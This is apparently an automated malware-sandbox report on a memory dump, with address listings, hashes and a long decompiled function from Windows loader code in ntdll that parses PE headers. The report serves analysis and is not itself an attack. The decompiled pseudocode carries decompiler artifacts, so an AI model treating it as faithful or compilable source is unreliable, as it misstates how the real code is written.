0x1e47ec0f
0x1e47ec12
0x1e47ec15
0x1e47ec15
0x1e47ec18
0x1e47ec1e
0x00000000
0x00000000
0x1e47ec22
0x1e47ec28
0x1e47ec4b
0x1e47ec5b
0x1e47ec5d
0x1e47ec63
0x1e47ec65
0x1e47ec68
0x1e47ec6b
0x1e47ec6b
0x1e47ec70
0x1e47ec71
0x1e47ec74
0x1e47ec7d
0x00000000
0x1e47ebe3
0x1e47ebe3
0x1e47ebe6
0x1e47ebe6
0x1e47ebe7
0x1e47ebe9
0x1e47ebec
0x00000000
0x1e47ebe6
0x1e47ebe1
0x1e47eba4
0x1e47eba9
0x1e47ebb0
0x1e47ebb3
0x00000000
0x00000000
0x00000000
0x00000000
0x1e47ebab
0x1e47ebab
0x1e47ebab
0x1e47ebac
0x1e47ebac
0x00000000
0x1e47ebab
0x1e47eb97
0x1e47eb19
0x1e47eb1c
0x1e47eb21
0x1e47eb26
0x1e47eb2c
0x1e47eb2c
0x00000000
0x1e47eb26
0x1e47ead6
0x1e47ead9
0x1e47eadc
0x1e47eadc
0x1e47eadc
0x1e47eade
0x1e47eae4
0x00000000
0x00000000
0x1e47eaee
0x1e47eaf7
0x1e47eaf9
0x00000000
0x00000000
0x1e47eb04
0x1e47eb12
0x00000000
0x1e47eb12
0x1e47eb06
0x00000000
0x1e47eb06
0x1e47eaf0
0x1e47eaf2
0x1e47eaf4
0x00000000
0x1e47eaf4
0x1e47ea6a
0x1e47ea21
0x00000000
0x1e47ea21
0x1e47e9d6
0x1e47e9d6
0x1e47e9e0
0x1e47e9e2
0x1e47e9e2
0x1e47e9e8
0x00000000
0x1e47e9e8
0x1e47e987
0x1e47e98f
0x1e47e992
0x1e47e995
0x1e47e995
0x1e47e998
0x1e47e998
0x1e47e99a
0x1e47e9a0
0x00000000
0x00000000
0x1e47e9a9
0x1e47e9b2
0x1e47e9b4
0x00000000
0x00000000
0x1e47e9ba
0x1e47e9c1
0x1e47e9cf
0x00000000
0x1e47e9cf
0x1e47e9c3
0x00000000
0x1e47e9c3
0x1e47e9ab
0x1e47e9ad
0x1e47e9af
0x00000000
0x1e47e9af
0x1e47e924
0x1e47e8b7
0x1e47e8ba
0x1e47e902
0x1e47e908
0x1e47e90a
0x00000000
0x1e47e90a
0x1e47e8bc
0x1e47e8bf
0x1e47e8f9
0x1e47e8ff
0x1e47e901
0x00000000
0x1e47e901
0x1e47e8c1
0x1e47e8c4
0x1e47e8f0
0x1e47e8f6
0x1e47e8f8
0x00000000
0x1e47e8f8
0x1e47e8c6
0x1e47e8c9
0x1e47e8e7
0x1e47e8ed
0x1e47e8ef
0x00000000
0x1e47e8ef
0x1e47e8cb
0x1e47e8ce
0x1e47e8de
0x1e47e8e4
0x1e47e8e6
0x00000000
0x1e47e8e6
0x1e47e8d3
0x00000000
0x1e47e8d5
0x1e47e8db
0x1e47e8dd
0x00000000
0x1e47e8dd
0x1e47e853
0x1e47e855
0x1e47e85b
0x1e47e85d
0x1e47e897
0x1e47e89c
0x1e47e8a2
0x1e47e8a6
0x1e47e8ab
0x1e47e8ad
0x1e47e8ad
0x00000000
0x1e47e85d

APIs

RtlDebugPrintTimes.NTDLL ref: 1E47EA10
RtlDebugPrintTimes.NTDLL ref: 1E47ED24

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 63daaac90782a02a6f373b058d83faefd7ae7544e9869c64f99f8786a5e004e1
Instruction ID: 3e64d8b3f5ed8824f7a0595f877793b5fca9410148f055bcb7501dfe641ffbae
Opcode Fuzzy Hash: 63daaac90782a02a6f373b058d83faefd7ae7544e9869c64f99f8786a5e004e1
Instruction Fuzzy Hash: 3202B472E006168FCB18CF69C9D16AEBBF6EF88200B55476EE456DB380D774E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3BD5E0, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 353
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E1E3BD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x1e49d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E1E3B6600(0x1e4952d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1e497b9c; // 0x0
							_t281 = L1E3C4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E1E3EF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1e497b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x1e497b8c; // 0x6c2a40
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E1E3C2280(_t200, 0x1e4984d8);
									_t277 =  *0x1e4985f4; // 0x6c4050
									_t351 =  *0x1e4985f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x6c3fe8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E1E3BFFB0(_t287, _t353, 0x1e4984d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E1E3FCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E1E3B6600(0x1e4952d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E1E3B7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x1e49b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E1E42E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1e498472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x1e49b218; // 0x0
														asm("ror edi, cl");
														 *0x1e49b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E1E3C2280(_t250, 0x1e4984d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L1E3E3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E1E3BFFB0(_t293, _t353, 0x1e4984d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E1E3E37F5(_t353, 0);
																}
																E1E3E0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E1E3D9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E1E3D02D6(_t174);
																}
																L1E3C77F0( *0x1e497b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E1E3DC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L1E3BEC7F(_t353);
										L1E3D19B8(_t287, 0, _t353, 0);
										_t200 = E1E3AF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E1E3EB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x1e49b2f8; // 0x0
									if((_t206 |  *0x1e49b2fc) == 0 || ( *0x1e49b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x1e49b2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E1E456B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E1E456AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E1E3BE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L1E3BEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E1E3E9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E1E3BE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L1E3B8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E1E3E3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x1e3bd5f2
0x1e3bd5f5
0x1e3bd5f5
0x1e3bd5fd
0x1e3bd600
0x1e3bd60a
0x1e3bd60d
0x1e3bd617
0x1e3bd61d
0x1e3bd627
0x1e3bd62e
0x1e3bd911
0x1e3bd913
0x00000000
0x1e3bd919
0x1e3bd919
0x1e3bd919
0x1e3bd634
0x1e3bd634
0x1e3bd634
0x1e3bd634
0x1e3bd640
0x1e3bd8bf
0x00000000
0x1e3bd646
0x1e3bd646
0x1e3bd64d
0x1e3bd652
0x1e40b2fc
0x1e40b2fc
0x1e40b302
0x1e40b33b
0x1e40b341
0x00000000
0x1e40b304
0x1e40b304
0x1e40b319
0x1e40b31e
0x1e40b324
0x1e40b326
0x1e40b332
0x1e40b347
0x1e40b34c
0x1e40b351
0x1e40b35a
0x00000000
0x1e40b328
0x1e40b328
0x00000000
0x1e40b328
0x1e40b326
0x1e3bd658
0x1e3bd658
0x1e3bd65b
0x1e3bd665
0x00000000
0x1e3bd66b
0x1e3bd66b
0x1e3bd66b
0x1e3bd66b
0x1e3bd66d
0x1e3bd672
0x1e3bd67a
0x00000000
0x00000000
0x1e3bd680
0x1e3bd686
0x1e3bd8ce
0x1e3bd8d4
0x1e3bd8dd
0x1e3bd8e0
0x1e3bd68c
0x1e3bd691
0x1e3bd69d
0x1e3bd6a2
0x1e3bd6a7
0x1e3bd6b0
0x1e3bd6b5
0x1e3bd6e0
0x1e3bd6b7
0x1e3bd6b7
0x1e3bd6b9
0x1e3bd6b9
0x1e3bd6bb
0x1e3bd6bd
0x1e3bd6ce
0x1e3bd6d0
0x1e3bd6d2
0x1e40b363
0x1e40b365
0x00000000
0x1e40b36b
0x00000000
0x1e40b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3bd6bf
0x1e3bd6bf
0x1e3bd6e5
0x1e3bd6e7
0x1e3bd6e9
0x1e3bd6ec
0x1e3bd6ec
0x1e3bd6ef
0x1e3bd6f5
0x1e3bd6f9
0x1e3bd6fb
0x1e3bd6fd
0x1e3bd701
0x1e3bd703
0x1e3bd70a
0x1e3bd70a
0x1e3bd701
0x1e3bd710
0x1e3bd710
0x1e3bd6c1
0x1e3bd6c1
0x1e3bd6c6
0x1e40b36d
0x1e40b36f
0x00000000
0x1e40b375
0x1e40b375
0x1e40b375
0x00000000
0x1e40b375
0x00000000
0x1e3bd6cc
0x1e3bd6d8
0x1e3bd6d8
0x1e3bd6d8
0x00000000
0x1e3bd6c6
0x1e3bd6bf
0x00000000
0x1e3bd6da
0x1e3bd6da
0x1e3bd716
0x1e3bd71b
0x1e3bd720
0x1e3bd726
0x1e3bd726
0x1e3bd72d
0x00000000
0x1e3bd733
0x1e3bd739
0x1e3bd742
0x1e3bd750
0x1e3bd758
0x1e3bd764
0x1e3bd776
0x1e3bd77a
0x1e3bd783
0x1e3bd928
0x1e3bd92c
0x1e3bd93d
0x1e3bd944
0x1e3bd94f
0x1e3bd954
0x1e3bd956
0x1e3bd95f
0x1e3bd961
0x1e3bd973
0x1e3bd973
0x1e3bd956
0x1e3bd944
0x1e3bd92c
0x1e3bd78b
0x1e40b394
0x1e3bd791
0x1e3bd798
0x1e40b3a3
0x1e40b3bb
0x1e40b3bb
0x1e3bd7a5
0x1e3bd866
0x1e3bd870
0x1e3bd884
0x1e3bd892
0x1e3bd898
0x1e3bd89e
0x1e3bd8a0
0x1e3bd8a6
0x1e3bd8ac
0x1e3bd8ae
0x1e3bd8b4
0x1e3bd8b4
0x1e3bd8ae
0x1e3bd7a5
0x1e3bd78b
0x1e3bd7b1
0x1e40b3c5
0x1e40b3c5
0x1e3bd7c3
0x1e3bd7ca
0x1e3bd7e5
0x1e3bd7eb
0x1e3bd8eb
0x1e3bd8ed
0x00000000
0x1e3bd8f3
0x1e3bd8f3
0x1e3bd8f3
0x00000000
0x1e3bd8ed
0x1e3bd7cc
0x1e3bd7cc
0x1e3bd7d2
0x00000000
0x1e3bd7d4
0x1e3bd7d4
0x1e3bd7d7
0x1e3bd7df
0x1e40b3d4
0x1e40b3d9
0x1e40b3dc
0x1e40b3dc
0x1e40b3df
0x1e40b3e2
0x1e40b468
0x1e40b46d
0x1e40b46f
0x1e40b46f
0x1e40b475
0x1e3bd8f8
0x1e3bd8f9
0x1e3bd8fd
0x1e40b3e8
0x1e40b3e8
0x1e40b3eb
0x1e40b3ed
0x00000000
0x1e40b3ef
0x1e40b3ef
0x1e40b3f1
0x1e40b3f4
0x1e40b3fe
0x1e40b404
0x1e40b409
0x1e40b40e
0x1e40b410
0x1e40b410
0x1e40b414
0x1e40b414
0x1e40b41b
0x1e40b420
0x1e40b423
0x1e40b425
0x1e40b427
0x1e40b42a
0x1e40b42d
0x1e40b42d
0x1e40b42a
0x1e40b432
0x1e40b436
0x1e40b438
0x1e40b43b
0x1e40b43b
0x1e40b449
0x1e40b44e
0x1e40b454
0x1e40b458
0x1e40b458
0x1e40b45d
0x00000000
0x1e40b45d
0x1e40b3ed
0x00000000
0x00000000
0x00000000
0x1e3bd7df
0x1e3bd7d2
0x1e3bd7ca
0x1e40b37c
0x1e40b37e
0x1e40b385
0x1e40b38a
0x00000000
0x1e40b38a
0x1e3bd742
0x1e3bd7f1
0x1e3bd7f8
0x1e40b49b
0x1e40b49b
0x1e3bd800
0x1e3bd837
0x1e3bd843
0x1e3bd845
0x1e3bd847
0x1e3bd84a
0x1e3bd84b
0x1e3bd84e
0x1e3bd857
0x1e3bd802
0x1e3bd802
0x1e3bd80d
0x00000000
0x1e3bd818
0x1e3bd818
0x1e3bd824
0x1e3bd831
0x1e40b4a5
0x1e40b4ab
0x1e40b4b3
0x1e40b4b8
0x1e40b4bb
0x00000000
0x1e40b4c1
0x1e40b4c1
0x1e40b4c8
0x00000000
0x1e40b4ce
0x1e40b4d4
0x1e40b4e1
0x1e40b4e3
0x1e40b4e5
0x00000000
0x1e40b4eb
0x1e40b4f0
0x1e40b4f2
0x1e3bdac9
0x1e3bdacc
0x1e3bdacf
0x1e3bdad1
0x1e3bdd78
0x1e3bdd78
0x1e3bdcf2
0x00000000
0x1e3bdad7
0x1e3bdad9
0x1e3bdadb
0x00000000
0x00000000
0x1e3bdae1
0x1e3bdae1
0x1e3bdae4
0x1e3bdae6
0x1e40b4f9
0x1e40b4f9
0x1e40b500
0x1e3bdaec
0x1e3bdaec
0x1e3bdaf5
0x1e3bdaf8
0x1e3bdafb
0x1e3bdb03
0x1e3bdb11
0x1e3bdb16
0x1e3bdb19
0x1e3bdb1b
0x1e40b52c
0x1e40b531
0x1e40b534
0x1e3bdb21
0x1e3bdb21
0x1e3bdb24
0x1e3bdcd9
0x1e3bdce2
0x1e3bdce5
0x1e3bdd6a
0x1e3bdd6d
0x00000000
0x1e3bdd73
0x1e40b51a
0x1e40b51c
0x1e40b51f
0x1e40b524
0x00000000
0x1e40b524
0x1e3bdce7
0x1e3bdce7
0x1e3bdce7
0x00000000
0x1e3bdce7
0x00000000
0x1e3bdb2a
0x1e3bdb2c
0x1e3bdb31
0x1e3bdb33
0x1e3bdb36
0x1e3bdb39
0x1e3bdb3b
0x1e3bdb66
0x1e3bdb66
0x1e3bdb3d
0x1e3bdb3d
0x1e3bdb3e
0x1e3bdb46
0x1e3bdb47
0x1e3bdb49
0x1e3bdb4c
0x1e3bdb53
0x1e3bdb55
0x1e3bdb58
0x1e3bdb5a
0x1e40b50a
0x1e40b50f
0x1e40b512
0x1e3bdb60
0x1e3bdb60
0x1e3bdb63
0x1e3bdb63
0x00000000
0x1e3bdb63
0x1e3bdb5a
0x1e3bdb3b
0x1e3bdb24
0x1e3bdb69
0x1e3bdb69
0x1e3bdb6c
0x1e3bdb6f
0x1e3bdb74
0x1e40b557
0x1e40b557
0x1e40b55e
0x1e3bdb7a
0x1e3bdb7c
0x1e3bdb7f
0x1e3bdb82
0x1e3bdb85
0x00000000
0x1e3bdb8b
0x1e3bdb8b
0x1e3bdb8d
0x1e3bdb9b
0x1e3bdb9b
0x1e3bdb9d
0x1e3bdba0
0x1e3bdba2
0x1e3bdba4
0x1e3bdba7
0x1e3bdba9
0x1e3bdbae
0x1e3bdbae
0x1e3bdbb1
0x1e3bdbb4
0x1e3bdbb4
0x1e3bdbb7
0x1e3bdbba
0x1e3bdcd2
0x1e3bdcd4
0x00000000
0x1e3bdbc0
0x1e3bdbc0
0x1e3bdbd2
0x1e3bdbd7
0x1e3bdbda
0x1e3bdbdd
0x1e3bdbdf
0x00000000
0x1e3bdbe5
0x1e3bdbe5
0x1e3bdbee
0x1e3bdbf1
0x1e40b541
0x1e40b544
0x00000000
0x1e40b546
0x1e40b546
0x00000000
0x1e40b546
0x1e3bdbf7
0x1e3bdbf7
0x1e3bdbfd
0x1e3bdbfd
0x1e3bdbff
0x1e3bdc0b
0x1e3bdc15
0x1e3bdc1b
0x1e3bdc1d
